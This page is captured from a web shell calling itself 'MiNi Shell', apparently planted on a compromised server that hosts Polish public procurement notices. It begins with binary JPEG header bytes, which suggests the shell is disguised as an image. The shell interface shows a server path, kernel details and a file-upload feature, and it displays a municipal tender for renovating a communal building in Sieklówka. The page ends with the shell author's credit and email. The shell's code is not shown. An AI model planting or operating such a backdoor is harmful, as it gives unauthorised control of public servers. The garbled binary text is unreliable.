JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250715/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250715/0032530401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa budynku komunalnego w Sieklówce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOŁACZYCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440324</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kołaczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-213</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kolaczyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.kolaczyce.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa budynku komunalnego w Sieklówce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93a62a8c-b84e-4357-a04f-44b09de8282f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00325304</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00091734/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa budynku komunalnego w Sieklówce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> w ramach projektu współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu nr „FEPK.02 Energia i Środowisko” programu regionalnego Fundusze Europejskie dla Podkarpacia 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kolaczyce-itl.logintrade.net/zapytania_email,203876,2978a0aa3f450565c0206d0012b75c09.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kolaczyce-itl.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej:<br/>Dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>•	Google Chrome 31<br/>•	Mozilla Firefox 26<br/>•	Opera 18<br/>Pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet<br/>•	zainstalowana wtyczka flash - flash player - dotyczy kupca<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – Ajar<br/>•	włączona obsługa JavaScript<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>•	zainstalowany Acrobat Reader<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:<br/>•	dla Windows Vista: Internet Explorer 8, Internet Explorer 9<br/>•	dla Windows 7: Internet Explorer 9, Internet Explorer 11<br/>•	dla Windows 8: Internet Explorer 11<br/>•	dla Windows 10: Internet Explorer 11<br/>Wspierane są rozwiązania dostarczane przez firmy:<br/>•	Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/>•	Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/>•	Powszechne Centrum Certyfikacji Certum firmy Asseco Data Systems S.A.<br/>•	Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.<br/>Dopuszczalne formaty przesyłanych danych:<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip, multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png, application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip, application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma, application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad, application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad, image/vnd.dwg, drawing/dwg<br/><br/>Kodowanie i oznaczenie czasu przekazania danych<br/>Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas, <br/>w którym zostanie potwierdzone złożenie oferty, dokumentu przez Wykonawcę. W przypadku wybrania opcji złożenia oferty bez logowania, potwierdzenie odbywa się poprzez kliknięcie w link dostępny w wiadomości mailowej, wysłanej automatycznie po złożeniu oferty, dokumentu będąc niezalogowanym na Platformie zakupowej. Wiadomość otrzymuje Wykonawca na adres e-mail wskazany w formularzu w ikonę „Złóż ofertę”. W przypadku Wykonawcy zalogowanego na Platformie Przetargowej, czas przekazania danych jest to czas wysłania dokumentu, oferty przez Platformę Przetargową.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IKM.271.1.9.2025.PH</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa budynku komunalnego w Sieklówce obejmuje:<br/>- remont konstrukcji dachu (uzupełnienie więźby o miecze, skucie gzymsu, przedłużenie okapu dachu, wymiana zbutwiałych elementów więźby dachowej, impregnacja więźby dachowej),<br/>- wymianę pokrycia wraz z orynnowaniem,<br/>- docieplenie kominów z wyprawą elewacyjną ponad dachem,<br/>- nową instalację odgromową,<br/>- wymianę zewnętrznej stolarki okiennej i drzwiowej,<br/>- docieplenie ścian zewnętrznych styropianem wraz z wyprawą elewacyjną,<br/>- montaż żaluzji zewnętrznych fasadowych,<br/>- izolację pionową fundamentów,<br/>- izolację termiczną poddasza,<br/>- remont schodów zewnętrznych,<br/>- wykonanie płytki odbojowej i chodników z kostki brukowej,<br/>- wykonanie miejsc postojowych do 10 stanowisk,<br/>- przebudowę ogrodzenia, <br/>- remont wewnętrznej instalacji wod-kan,<br/>- remont instalacji C.O.,<br/>- modernizację kotłowni (wymiana pieca C.O. dla Ośrodka Zdrowia),<br/>- montaż instalacji fotowoltaicznej z magazynem energii,<br/>- montaż klimatyzacji,<br/>- montaż gruntowej pompy ciepła z odwiertami pionowymi,<br/>- dostarczenie i montaż oznakowań i sprzętu dla niepełnosprawnych. <br/><br/>Opis szczegółowy:<br/>I. Branża budowlana <br/>1. Roboty rozbiórkowe zewnętrzne -1 kpl<br/>2. Roboty rozbiórkowe wewnętrzne -1 kpl<br/>3. Roboty murowe, kominy<br/>- nadproża stalowe – 6,16 m<br/>- przemurowanie okien i kominów – 2,28 m3<br/>- docieplenie kominów z wyprawą z tynku silikonowego – 126,50 m2<br/>- malowanie kominów – 84,25 m2<br/>4. Więźba dachowa<br/>- konstrukcja dachowa (murłaty, słupki, miecze) – 2,53 m3<br/>- izolacja z folii dachowej – 266,32 m2<br/>- łacenie (łaty 50x40mm, kontrłaty 25x60mm) – 266,32 m2<br/>5. Pokrycie<br/>- pokrycie z blachy płaskiej gr. 0,50mm na rąbek stojący RAL9005, puralmat – 272,41 m2<br/>- obróbki blacharskie – 74,02 m2<br/>- rynny i rury spustowe systemowe z blachy powlekanej – 136,16 m<br/>- bariery śniegowe – 70,36 m<br/>- ławy kominiarskie – 4 szt.<br/>- wyłaz dachowy 86x87cm – 1 szt.<br/>6. Wymiana przykanalików do rur spustowych – 6 szt.<br/>7. Izolacja termiczna poddasza<br/>- posprzątanie strychu z utylizacją – 1 kpl<br/>- izolacja z wełny mineralnej gr.25cm (15cm+10cm) z paroizolacja z folii – 214,32 m2<br/>- ścianki działowe z płyt g-k – 1,89 m2<br/>- ocieplenie ścian kolankowych i ścian klatki na strychu płytami z wełny wraz z malowaniem farbą fasadową – 63,85 m2<br/>8. Stolarka okienna <br/>- okna PVC U=0,9W/m2*K, kolor RAL7012 – 93,32 m2<br/>- podokienniki z aglomarmuru – 29,97m<br/>9. Stolarka drzwiowa<br/>- drzwi aluminiowe U=1,3W/m2*K, kolor RAL7012 – 9,17 m2<br/>- bramy garażowe segmentowe U=1,4W/m2*K, kolor RAL7012/biały, sterowanie ręczne – 5,22 m2<br/>- naświetle stałe RAL7012 – 4,0 m2<br/>10. Tynki i malowanie<br/>- uzupełnienie tynków – 208,58 m2<br/>- poprawki malarskie – 140,0 m2<br/>11. Roboty kowalsko-ślusarskie<br/>- balustrady schodowe i balkonowe chromoniklowe - 18,17 m<br/>- daszek ze stali kwasoodpornej – 1,80 m2<br/>- kratka wentylacyjna zestali kwasoodpornej – 2szt<br/>12. Oznakowania dla osób niepełnosprawnych<br/>- dostarczenie i montaż oznakowań i sprzętu dla niepełnosprawnych: mapa tyflograficzna (1 szt.), tablice z informacją pisaną i piktograficzną (1 szt.), oznakowanie pomieszczeń i ciągów komunikacyjnych alfabetem Braillea (11 tabliczek), linie naprowadzające, pola uwag (1 kpl), nakładki na poręcze schodów i pochylni (8 szt.), tabliczki kierunkowe i oznaczenia ewakuacyjne w alfabecie Braillea (6 szt.), taśmy antypoślizgowe do oznaczenia pierwszego i ostatniego stopnia biegu schodów (1 kpl), pętle indukcyjne (1 szt.), system Call Hear (1 szt.), krzesło ewakuacyjne(1 szt.), schodołaz (1szt)<br/>13. Urządzenia zacieniające (żaluzje fasadowe)<br/>- żaluzje fasadowe sterowane elektrycznie, natynkowe, kolor szary antracyt – 32 szt.<br/>14. Izolacja pionowa fundamentów<br/>- oczyszczenie powierzchni murów, izolacja 2x dysperbit, izolacja styrodur12cm, folia kubełkowa – 68,58 m2<br/>15. Elewacja<br/>- docieplenie ścian styropianem gr.15cm, 10cm, 3cm, 5cm – 611,17 m2<br/>- wyprawa elewacyjna z tynku silikonowego – 459,60 m2<br/>- wyprawa z tynku mozaikowego – 152,10 m2<br/>- rusztowania – 722,69 m2<br/>- oprawy oświetlenia zewnętrznego – 4 szt.<br/>16. Balkon<br/>- czyszczenie, gruntowanie, okładzina z płytek gres – 2,50 m2<br/>17. Schody zewnętrzne<br/>- oczyszczenie, warstwa wyrównawcza, gruntowanie, okładzina z płytek granitowych – 24,63 m2<br/>- okładzina boków i spodu schodów z tynku silikonowego na warstwie siatki i kleju – 19,32 m2<br/>18. Pochylnia/podjazd<br/>- gruntowanie z warstwą naprawczą – 32,60 m2<br/>- warstwa żywicy poliuretanowej, RAL 7040 – 32,60 m2<br/>- nakrywa od góry krawężników pochylni płytkami granitowymi – 6,79 m2<br/>- malowanie farbą fasadową słupów, spodu i boków pochylni na warstwie siatki i kleju – 60,30 m2<br/>- czyszczenie i malowanie balustrad pochylni i podjazdu – 51,32 m2<br/>18. Płytka odbojowa, chodnik, droga manewrowa, miejsca postojowe<br/>- roboty przygotowawcze – 1 kpl<br/>- roboty rozbiórkowe – 1 kpl<br/>- płytka odbojowa/chodnik z kostki brukowej gr. 6÷6,5cm /wg dokumentacji projektowej/ na podbudowie z kruszyw – 134,89 m2<br/>- droga manewrowa/miejsca postojowe z kostki brukowej gr. 8cm /wg dokumentacji projektowej/ na podbudowie z kruszyw – 273,0 m2<br/>- miejsca postojowe z płyt ażurowych 50x50x10cm na podbudowie z kruszyw – 110,0 m2<br/>- oznakowanie miejsca dla inwalidów – 1 szt<br/>19. Zjazd<br/>- nawierzchnia z mieszanek mineralno-bitumicznych (4cm+4cm) na podbudowie z kruszyw - 18,0 m2<br/>20. Przebudowa ogrodzenia<br/>- roboty rozbiórkowe istniejącego ogrodzenia – 1 kpl<br/>- roboty montażowe (podkłady, stopy, ławy, cokół) – 32,17 m3<br/>- roboty montażowe (zbrojenie) – 0,58 t<br/>- przęsła ogrodzeniowe 2,23x1,25m stalowe, ocynkowane, malowane proszkowo RAL7016 – 176,50m<br/>- brama ogrodzeniowa 4,40x1,48m, ocynkowana, malowana proszkowo RAL7016 – 1 kpl<br/>- furtka ogrodzeniowa 1,05x1,50m, ocynkowana, malowana proszkowo RAL7016 – 1 kpl<br/><br/>II. Branża elektryczna– 1 kpl<br/>- instalacja zasilania żaluzji fasadowych – 1 kpl<br/>- instalacja odgromowa – 1 kpl<br/>- instalacja fotowoltaiczna z magazynem energii (12 paneli o mocy 6,48kW) – 1kpl<br/>- prace demontażowe i montażowe kolidujących solarów – 1 kpl<br/><br/>III. Branża sanitarna <br/>- instalacja wod-kan (rury PP 151,0m, rurociąg PCW 111,0m, osprzęt 21szt) – 1 kpl	<br/>- instalacja C.O. (rurociąg PE 188,0m, grzejnik stalowy płytowy 30szt) – 1 kpl<br/>- roboty rozbiórkowe – 1 kpl<br/>- instalacja gruntowej pompy ciepła z kotłownią (gruntowa pompa ciepła 27kW, 7 odwiertów pionowych, kocioł gazowy 25,5kW) – 1 kpl<br/>- instalacja klimatyzacji (7 jednostek wewnętrznych, 2 jednostki zewnętrzne)– 1kpl </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej.<br/>Zamawiający uzna ten warunek za spełniony jeżeli wykonawcy wykażą, że:<br/>•	wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie co najmniej 2 roboty związane z budową, rozbudową, przebudową budynku w zakresie porównywalnym z przedmiotem zamówienia na kwotę brutto min 500 000,00 zł wraz z załączeniem dowodów określających czy ta robota budowlana została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego robota budowlana została wykonywana, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty<br/>•	skierują do realizacji zamówienia publicznego osoby odpowiedzialne za kierowanie robotami budowlanymi, posiadające kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia publicznego:<br/>- minimum jedna osoba posiadająca uprawnienia posiadająca uprawnienia do kierowania robotami budowlanymi w branży konstrukcyjno-budowlanej<br/>- minimum jedna osoba posiadająca uprawnienia posiadająca uprawnienia do kierowania robotami budowlanymi w branży elektrycznej<br/>- minimum jedna osoba posiadająca uprawnienia posiadająca uprawnienia do kierowania robotami budowlanymi w branży sanitarnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Każdy wykonawca zobowiązany jest do wniesienia wadium w terminie do dnia 29.07.2025 r. do godz. 1000 w wysokości: 15 000,00 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wzór umowy stanowi załącznik nr 3 do SWZ<br/>2.	Warunki zmian treści umowy zostały określone w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kolaczyce-itl.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-30 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com